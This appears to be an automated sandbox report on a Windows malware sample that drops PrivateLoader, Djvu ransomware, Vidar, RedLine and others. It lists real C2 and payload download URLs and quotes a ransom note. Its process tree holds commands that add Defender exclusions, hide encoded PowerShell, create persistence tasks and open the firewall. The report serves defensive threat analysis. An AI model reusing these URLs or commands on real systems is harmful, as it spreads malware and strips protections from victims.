Analysis

  • max time kernel
    450s
  • max time network
    453s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    05-07-2022 10:59

General

  • Target

    faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe

  • Size

    732KB

  • MD5

    659ac9c3f3c0fffb292704cb5e7dd699

  • SHA1

    a3ee2528280cd762c130f680af08583df22bb435

  • SHA256

    faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd

  • SHA512

    0b99ae205eb06e39f0befef1c41776cbddda78e674c639eb51968bba4b70aad45cc7b0dbf4ad9bed12a7a82ac31943185b8f59aab082afb15d9b91924889db10

Malware Config

Extracted

Family

privateloader

C2

http://212.193.30.45/proxies.txt

http://85.202.169.116/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

85.202.169.116

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

http://212.193.30.29/server.txt

212.193.30.21

Attributes
  • payload_url

    http://193.233.185.125/download/NiceProcessX64.bmp

    http://193.233.185.125/download/NiceProcessX32.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp

    https://c.xyzgamec.com/userdown/2202/random.exe

    http://193.56.146.76/Proxytest.exe

    http://www.yzsyjyjh.com/askhelp23/askinstall23.exe

    http://privacy-tools-for-you-780.com/downloads/toolspab3.exe

    http://luminati-china.xyz/aman/casper2.exe

    https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe

    http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe

    https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp

    http://185.215.113.208/ferrari.exe

    https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp

    https://c.xyzgamec.com/userdown/2202/random.exe

    http://mnbuiy.pw/adsli/note8876.exe

    http://www.yzsyjyjh.com/askhelp23/askinstall23.exe

    http://luminati-china.xyz/aman/casper2.exe

    https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe

    http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe

    https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe

    https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe

    https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe

    https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe

    https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

    http://64.227.67.0/searchApp.exe

Extracted

Family

djvu

C2

http://acacaca.org/test3/get.php

Attributes
  • extension

    .eiur

  • offline_id

    JPKXWc5eWNjIicWmQyJxv6NCjbH02qrKi0af9Zt1

  • payload_url

    http://rgyui.top/dl/build2.exe

    http://acacaca.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-aMsnHoiJcO Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0510Usjdjs

rsa_pubkey.plain

Extracted

Family

vidar

Version

53.1

Botnet

1448

C2

https://t.me/tg_dailyrunnings

https://mastodon.online/@olegf9844g

Attributes
  • profile_id

    1448

Extracted

Family

vidar

Version

53

Botnet

937

C2

https://t.me/ch_inagroup

https://mastodon.social/@olegf9844e

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

Lyla28.06

C2

185.215.113.16:21921

Attributes
  • auth_value

    de24aa7fc89cb989c29bc8e2697f6d2a

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Colibri Loader

    A loader sold as MaaS first seen in August 2021.

  • Detected Djvu ransomware 10 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Amadey CnC Check-In

    suricata: ET MALWARE Amadey CnC Check-In

  • suricata: ET MALWARE Generic gate .php GET with minimal headers

    suricata: ET MALWARE Generic gate .php GET with minimal headers

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

    suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers

    suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers

  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

    suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

  • suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved

    suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved

  • suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer

    suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer

  • suricata: ET MALWARE Win32/Colibri Loader Activity

    suricata: ET MALWARE Win32/Colibri Loader Activity

  • suricata: ET MALWARE Win32/Colibri Loader Activity M2

    suricata: ET MALWARE Win32/Colibri Loader Activity M2

  • suricata: ET MALWARE Win32/Colibri Loader Activity M3

    suricata: ET MALWARE Win32/Colibri Loader Activity M3

  • suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download

    suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download

  • suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key

    suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload

    suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload

  • Vidar Stealer 6 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 23 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 13 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 19 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Detects Pyinstaller 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 29 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 7 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
    "C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3620
    • C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
      "C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • Checks computer location settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4196
      • C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
        "C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        PID:3704
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
          4⤵
            PID:968
          • C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
            "C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"
            4⤵
            • Executes dropped EXE
            PID:3516
        • C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe
          "C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe"
          3⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          PID:4436
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
            4⤵
            • Creates scheduled task(s)
            PID:4212
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
            4⤵
            • Creates scheduled task(s)
            PID:3112
          • C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe
            "C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe"
            4⤵
            • Modifies Windows Defender Real-time Protection settings
            • Executes dropped EXE
            • Checks computer location settings
            PID:1808
            • C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe
              "C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe"
              5⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:968
              • C:\Windows\SysWOW64\control.exe
                "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                6⤵
                  PID:4596
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                    7⤵
                    • Loads dropped DLL
                    PID:5532
                    • C:\Windows\system32\RunDll32.exe
                      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                      8⤵
                      • Blocklisted process makes network request
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4688
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                        9⤵
                        • Loads dropped DLL
                        PID:6036
              • C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
                "C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe"
                5⤵
                • Executes dropped EXE
                • Checks computer location settings
                PID:3608
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 452
                  6⤵
                  • Program crash
                  PID:4292
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 776
                  6⤵
                  • Program crash
                  PID:1044
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 784
                  6⤵
                  • Program crash
                  PID:4436
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 784
                  6⤵
                  • Program crash
                  PID:2596
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 824
                  6⤵
                  • Program crash
                  PID:3240
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 984
                  6⤵
                  • Program crash
                  PID:6112
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1012
                  6⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:5348
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1364
                  6⤵
                  • Program crash
                  PID:3224
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe" & exit
                  6⤵
                    PID:4128
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f
                      7⤵
                      • Kills process with taskkill
                      PID:2176
                • C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe
                  "C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:5436
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 5436 -s 708
                    6⤵
                    • Program crash
                    PID:6044
                • C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe
                  "C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:5408
                  • C:\Users\Admin\AppData\Local\Temp\7zSDD85.tmp\Install.exe
                    .\Install.exe
                    6⤵
                    • Executes dropped EXE
                    PID:4192
                    • C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe
                      .\Install.exe /S /site_id "525403"
                      7⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks computer location settings
                      • Drops file in System32 directory
                      • Enumerates system info in registry
                      PID:2200
                      • C:\Windows\SysWOW64\forfiles.exe
                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                        8⤵
                          PID:6100
                          • C:\Windows\SysWOW64\cmd.exe
                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                            9⤵
                              PID:4200
                              • \??\c:\windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                10⤵
                                  PID:4688
                                • \??\c:\windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                  10⤵
                                    PID:1824
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                8⤵
                                  PID:3464
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                    9⤵
                                      PID:2440
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                        10⤵
                                          PID:4984
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                          10⤵
                                            PID:3976
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "gHbFtyKwQ" /SC once /ST 00:21:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                        8⤵
                                        • Creates scheduled task(s)
                                        PID:5364
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn "gHbFtyKwQ"
                                        8⤵
                                          PID:5840
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            9⤵
                                            • Loads dropped DLL
                                            PID:5044
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /DELETE /F /TN "gHbFtyKwQ"
                                          8⤵
                                            PID:2496
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /CREATE /TN "bamNpdvhtkzLwlCraC" /SC once /ST 13:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe\" bH /site_id 525403 /S" /V1 /F
                                            8⤵
                                            • Drops file in Windows directory
                                            • Creates scheduled task(s)
                                            PID:1712
                                    • C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5396
                                      • C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe" H
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5996
                                    • C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:5344
                                      • C:\Windows\SysWOW64\attrib.exe
                                        attrib -?
                                        6⤵
                                        • Views/modifies file attributes
                                        PID:5628
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c cmd < Inebriarti.htm & ping -n 5 localhost
                                        6⤵
                                          PID:5452
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd
                                            7⤵
                                              PID:3092
                                              • C:\Windows\SysWOW64\tasklist.exe
                                                tasklist /FI "imagename eq PSUAService.exe"
                                                8⤵
                                                • Enumerates processes with tasklist
                                                PID:109220
                                              • C:\Windows\SysWOW64\find.exe
                                                find /I /N "psuaservice.exe"
                                                8⤵
                                                  PID:109248
                                                • C:\Windows\SysWOW64\findstr.exe
                                                  findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm
                                                  8⤵
                                                    PID:109280
                                                  • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
                                                    Tal.exe.pif H
                                                    8⤵
                                                    • Loads dropped DLL
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:109296
                                                    • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
                                                      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
                                                      9⤵
                                                        PID:1164
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 12
                                                          10⤵
                                                          • Program crash
                                                          PID:6312
                                                    • C:\Windows\SysWOW64\PING.EXE
                                                      ping localhost -n 5
                                                      8⤵
                                                      • Runs ping.exe
                                                      PID:109316
                                                  • C:\Windows\SysWOW64\PING.EXE
                                                    ping -n 5 localhost
                                                    7⤵
                                                    • Runs ping.exe
                                                    PID:109464
                                          • C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe
                                            "C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            PID:4052
                                            • C:\Windows\SysWOW64\control.exe
                                              "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                                              4⤵
                                                PID:4216
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                                                  5⤵
                                                    PID:5044
                                                    • C:\Windows\system32\RunDll32.exe
                                                      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                                                      6⤵
                                                        PID:6072
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                                                          7⤵
                                                          • Loads dropped DLL
                                                          PID:5156
                                                • C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1744
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 2068
                                                    4⤵
                                                    • Program crash
                                                    PID:6016
                                                • C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2948
                                                • C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:1624
                                                  • C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Drops file in Windows directory
                                                    • Modifies data under HKEY_USERS
                                                    PID:3284
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                      5⤵
                                                        PID:2480
                                                        • C:\Windows\system32\netsh.exe
                                                          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                          6⤵
                                                          • Modifies Windows Firewall
                                                          PID:2272
                                                      • C:\Windows\rss\csrss.exe
                                                        C:\Windows\rss\csrss.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        PID:4588
                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                          6⤵
                                                          • Creates scheduled task(s)
                                                          PID:5940
                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                          schtasks /delete /tn ScheduledUpdate /f
                                                          6⤵
                                                            PID:5732
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              7⤵
                                                                PID:5628
                                                            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
